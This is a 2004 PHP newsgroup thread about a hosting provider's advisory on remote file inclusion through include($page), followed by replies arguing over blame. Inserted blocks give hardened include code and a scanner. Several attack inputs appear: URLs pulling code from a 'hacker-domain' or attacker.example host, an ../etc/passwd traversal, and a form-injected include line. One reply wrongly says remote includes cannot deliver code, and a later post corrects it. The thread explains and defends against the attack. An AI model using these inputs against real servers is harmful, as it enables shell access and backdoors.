
PHP blamed for security problems

Here's what this morning's security advisory read here:

``In the last 3 months we have noticed a marked increase in the number of
web-server attacks and successful compromises on our network. These are
mostly PHP-script exploits and are giving hackers easy shell access to
virtual servers, as mentioned in the PHP Security Advisory in the News
section of the control centre. We really cannot do much about these
network attacks other than to inform our customers to stay vigilant and
upgrade PHP-script software whenever newer versions become available.
The allow_url_open change to PHP is about as much as we can do here.''

They offer a more detailed description of the problem:

``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfully gained
shell access via insecure PHP scripts.

Following our own investigation of these hacked accounts, we
believe we have established the common point-of-entry for
these attacks.

As you may be aware, PHP provides a number of functions for
opening files such as 'fopen()' and it's also possible to
pass an HTTP or FTP URL to these such that
fopen('http://www.dsvr.co.uk/'); will fetch the contents of
the DSVR homepage for PHP to treat as a file.

What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.

Many clients seem to be using PHP that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>

as a cheap way to manage common headers and footers. These
pages can be accessed like so:

http://www.your-domain.co.uk/index.php?page=about.inc

so that a file 'about.inc' is included inside the standard
header/footer.

However, unless the $page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.p...oot-script.txt

This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #1
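The pattern the advisory describes, beside two hardened versions, as an added example that is not part of the original post or of the hosting provider's advisory. The `pages/` directory, the `.inc` file names and the allow-list contents are assumptions made for this example. Note that switching off allow_url_fopen (the setting the advisory refers to) only removes the remote-URL case; the same `include($page)` remains a local file inclusion bug until the path itself is checked.

```php
<?php
// Added example, not from the original post or from the hosting provider's
// advisory. Shows the include($page) pattern the advisory describes beside
// two hardened versions. The 'pages/' directory, the .inc file names and
// the allow-list contents are assumptions made for this example.

// VULNERABLE: $page comes straight from the query string. With allow_url_fopen
// enabled, ?page=http://attacker.example/x.txt fetches and executes remote
// PHP. With it disabled the code is still a local file inclusion:
// ?page=../../../../etc/passwd echoes that file into the page, and a log
// file an attacker has seeded with PHP tags gets executed.
function vulnerable_include(string $page): void
{
    include($page);
}

// HARDENED, option 1: an explicit allow-list. The request value is only ever
// used as an array key; the path that reaches include() never contains
// user-supplied characters.
const PAGE_FILES = [
    'about'   => 'pages/about.inc',
    'contact' => 'pages/contact.inc',
];

function safe_include_allowlist(string $page): bool
{
    if (!array_key_exists($page, PAGE_FILES)) {
        return false; // unknown key: caller renders a 404, never the raw value
    }
    include(__DIR__ . '/' . PAGE_FILES[$page]);
    return true;
}

// HARDENED, option 2: confine to one directory when the set of pages is
// open-ended. Reject anything that is not a short plain name (so no '/',
// '.', ':' or "http://"), then resolve the path and check that the resolved
// file still lives inside the pages directory (catches symlinks).
function resolve_page_path(string $page, string $baseDir): ?string
{
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.inc');
    if ($base === false || $full === false) {
        return null; // directory or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved path escaped the directory
    }
    return $full;
}

function safe_include_confined(string $page, string $baseDir): bool
{
    $full = resolve_page_path($page, $baseDir);
    if ($full === null) {
        return false;
    }
    include($full);
    return true;
}

// Typical use in the index.php the advisory describes:
//   $page = $_GET['page'] ?? 'about';
//   if (!safe_include_allowlist($page)) { http_response_code(404); }
```

Keep allow_url_fopen off in php.ini as well, and on PHP 5.2 or later also allow_url_include (which gates include/require separately from fopen), but treat those as defence in depth rather than the fix: they stop the remote fetch only, and the `../` and log-file cases above remain unless the path is checked as in the two hardened functions.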
> Many clients seem to be using PHP that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>


Sadly that's so true. It's a shame taint checking isn't available in php
to warn about that sort of thing.

It isn't php's fault as such. I've come across similar dynamic include
problems at regular intervals for years (dBase used to allow it and
could be royally screwed). It's just ten times worse when you can access
off-site files and execute in local context.

Jul 17 '05 #2
With total disregard for any kind of safety measures Kevin Thorpe
<ke***@pricetra k.com> leapt forth and uttered:
It isn't php's fault as such. I've come across similar dynamic
include problems at regular intervals for years (dBase used to
allow it and could be royally screwed). It's just ten times
worse when you can access off-site files and execute in local
context.


But if you include remote files via HTTP, then you are making a
HTTP request. You can't include source code from another server
because the HTTP response will not pass the code, only the output
from the code.

Ultimately the security risk arises from shit programmers. Not the
language itself.

--
Phil Roberts | Dork Pretending To Be Hard | http://www.flatnet.net/
Jul 17 '05 #3
"Phil Roberts" <ph*****@HOLYfl atnetSHIT.net> wrote in message
news:Xn******** *************** **@216.196.97.1 32...
With total disregard for any kind of safety measures Kevin Thorpe
<ke***@pricetra k.com> leapt forth and uttered:
It isn't php's fault as such. I've come across similar dynamic
include problems at regular intervals for years (dBase used to
allow it and could be royally screwed). It's just ten times
worse when you can access off-site files and execute in local
context.


But if you include remote files via HTTP, then you are making a
HTTP request. You can't include source code from another server
because the HTTP response will not pass the code, only the output
from the code.

Ultimately the security risk arises from shit programmers. Not the
language itself.

--
Phil Roberts | Dork Pretending To Be Hard | http://www.flatnet.net/

True, it will not include the source, only the output, but you can write a
PHP script that outputs valid code.

an example would be:

<?php
// hosted on the attacker's server; its *output* is valid PHP source
print "<?php\n";
print "// do some evil here\n";
print "?>\n";
?>

and if you included this from another site it would appear to be valid code.

I agree that it is not a PHP concern, but a lack of forethought (hey, I am
guilty too, but I get to it); the same security risks exist in Perl as well.
They are just easier in PHP.

One of the biggest things I see is people taking data from an input form,
writing it to a file, then doing an include() on it. Just put <?php
include('http://www.bla.com/script.php'); ?> into a form input box and you're
good to go.

Perhaps when we give examples we should also encourage the use of a bit of
security, and it helps when we point it out to each other as well. In fact
numerous people here (Pedro, Chung, Tim, and many others) have pointed stuff
out to me. It helps all of us stay on our toes, and allows us to give better
examples that are not so sloppy.

--
Mike Bradley
http://www.gzentools.com -- free online php tools
Jul 17 '05 #4
Phil Roberts <ph*****@holyfl atnetshit.net> wrote:
<snip>
But if you include remote files via HTTP, then you are making a
HTTP request. You can't include source code from another server
because the HTTP response will not pass the code, only the output
from the code.


For the sake of others stumbling upon this post, it is completely wrong. I
think if Phil re-read this he'd realize why. (And if not, re-read the
original post and the URL of the sample malicious script.)

- Bill
Jul 17 '05 #5
On 2004-03-16, Tim Tyler <ti*@tt1lock.or g> wrote:
Here's what this morning's security advisory read here:
``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.
And who's to blame for that? The PHP script? Or the sysadmin that gives
too many rights to the user that is running Apache?
What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.
First line in the manual (So people can't say they didn't know)
The include() statement includes and evaluates the specified file.
This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''


Again, if a local user has the rights to do all this stuff....
Then the admins should be fired for allowing this.
--
http://home.mysth.be/~timvw
Jul 17 '05 #6
On 17 Mar 2004 01:15:16 GMT, Tim Van Wassenhove hath writ:
On 2004-03-16, Tim Tyler <ti*@tt1lock.or g> wrote:
Here's what this morning's security advisory read here:
``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.


And who's to blame for that? The PHP script? Or the sysadmin that gives
too many rights to the user that is running Apache?
What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.


First line in the manual (So people can't say they didn't know)
The include() statement includes and evaluates the specified file.
This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''


Again, if a local user has the rights to do all this stuff....
Then the admins should be fired for allowing this.


At a previous ISP -- who also hosted my web site -- I noticed
one day that files I created/updated in PHP were assigned the
ownerid of ---- *me* -- my logonid for the hosting machine!
Crap!! I was also trying to use some secure (userid:password)
http access to some things inside my account -- using file
ownerships to control access to some data.
I pointed this out to the 'web master', and asked "Why!?".
I never got a reply, but several days later I noticed the PHP
program(s) were no longer creating files with owner: my-userid.
Instead, they were ownerid: *root* !!! Geez-Zuss!!!
I moved my account(s) the next day.

Jonesy
--
| Marvin L Jones | jonz | W3DHJ | OS/2
| Gunnison, Colorado | @ | Jonesy | linux __
| 7,703' -- 2,345m | config.com | DM68mn SK
Jul 17 '05 #7
"Allodoxaphobia " <bi********@con fig.com> wrote in message
news:sl******** *************** @localhost.conf ig.com...
I never got a reply, but several days later I noticed the PHP
program(s) were no longer creating files with owner: my-userid.
Instead, they were ownerid: *root* !!! Geez-Zuss!!!
I moved my account(s) the next day.

Jonesy
--
| Marvin L Jones | jonz | W3DHJ | OS/2
| Gunnison, Colorado | @ | Jonesy | linux __
| 7,703' -- 2,345m | config.com | DM68mn SK


Wait, don't go away, what hosting company? :)

(just kidding)

--
Mike Bradley
http://www.gzentools.com -- free online php tools
Jul 17 '05 #8
Here's what this morning's security advisory read here:
``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.


And who's to blame for that? The php script? Or the sysadmin that gives
to many rights to the user that is running apache?


I tend to agree with you here. The fact that the user makes
mistakes/(oversights?) is not a reflection on how PHP works.
Every application, from Windows to Linux, can have its basic security
bypassed by user actions (I can drop my firewalls, leave the user name as
'Administrator' and so forth).
I would go as far as saying that PHP *itself* is very secure.

Maybe PHP could prevent the usage of include(...) from a $_GET/$_POST, but
how can that really be enforced...

I have been wanting to write an app for some time that goes through PHP scripts
and flags possible security risks. I don't know if I really have the time
to.

Simon.
Jul 17 '05 #9
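A small version of the scan described in the post above, as an added example that is not part of the original thread and not a real tool. It uses PHP's own tokenizer (`token_get_all`, from the tokenizer extension) rather than regexes, flags every include/require whose argument is not a fixed string, and rates an argument that reads a request superglobal directly as high. The `$sample` source is constructed for this example.

```php
<?php
// Added example, not from the post above and not a real tool. A small
// tokenizer-based scan that flags include/require statements whose argument
// is not a fixed string, and rates ones that read a request superglobal
// directly as high. The $sample source below is constructed for this example.

const REQUEST_SUPERGLOBALS = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE', '$_SERVER', '$_FILES'];
const INCLUDE_TOKENS = [T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE];

function find_dynamic_includes(string $source): array
{
    $findings = [];
    $tokens = token_get_all($source);
    $count = count($tokens);

    for ($i = 0; $i < $count; $i++) {
        $tok = $tokens[$i];
        if (!is_array($tok) || !in_array($tok[0], INCLUDE_TOKENS, true)) {
            continue;
        }

        // Walk the argument expression up to the end of the statement.
        $expr = '';
        $severity = null;
        for ($j = $i + 1; $j < $count; $j++) {
            $t = $tokens[$j];
            if ($t === ';' || (is_array($t) && $t[0] === T_CLOSE_TAG)) {
                break;
            }
            if (!is_array($t)) {          // single-character token: ( ) . [ ]
                $expr .= $t;
                continue;
            }
            if ($t[0] === T_WHITESPACE) {
                continue;
            }
            $expr .= $t[1];
            if ($t[0] === T_VARIABLE) {
                // Any variable makes the path dynamic; a request superglobal
                // means user input reaches include() with no indirection.
                $severity = in_array($t[1], REQUEST_SUPERGLOBALS, true)
                    ? 'high'
                    : ($severity ?? 'medium');
            }
        }

        if ($severity !== null) {
            $findings[] = [
                'line'      => $tok[2],
                'statement' => $tok[1],
                'expr'      => $expr,
                'severity'  => $severity,
            ];
        }
    }
    return $findings;
}

// Constructed sample: two fixed includes and two dynamic ones.
$sample = <<<'PHP'
<?php
include('header.inc');
include($page);
require_once __DIR__ . '/lib/db.php';
include("pages/" . $_GET['page'] . ".inc");
?>
PHP;

foreach (find_dynamic_includes($sample) as $f) {
    printf("line %d: %s %s  [%s]\n", $f['line'], $f['statement'], $f['expr'], $f['severity']);
}
```

Run it with the PHP CLI; on the constructed sample it reports line 3 (`include($page)`) as medium, since the tokenizer cannot tell where `$page` came from, and line 5 as high. The medium findings are the ones that need a human to trace the variable back to its source, which is the taint tracking the earlier reply notes PHP does not do for you.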
Tim Tyler <ti*@tt1lock.or g> wrote in message news:<Hu******* *@bath.ac.uk>.. .
<snip>

However, unless the $page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.p...oot-script.txt

This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''


Blame the design and the programmers, not PHP.

In India, we can file a case against anyone who damages one's name
with a kind of hoax. I don't know whether we should take some efforts
to sue such people who intentionally damage PHP instead of blaming the
design and programmers.

--
http://www.sendmetoindia.com - Send Me to India!
Email: rrjanbiah-at-Y!com
Jul 17 '05 #10


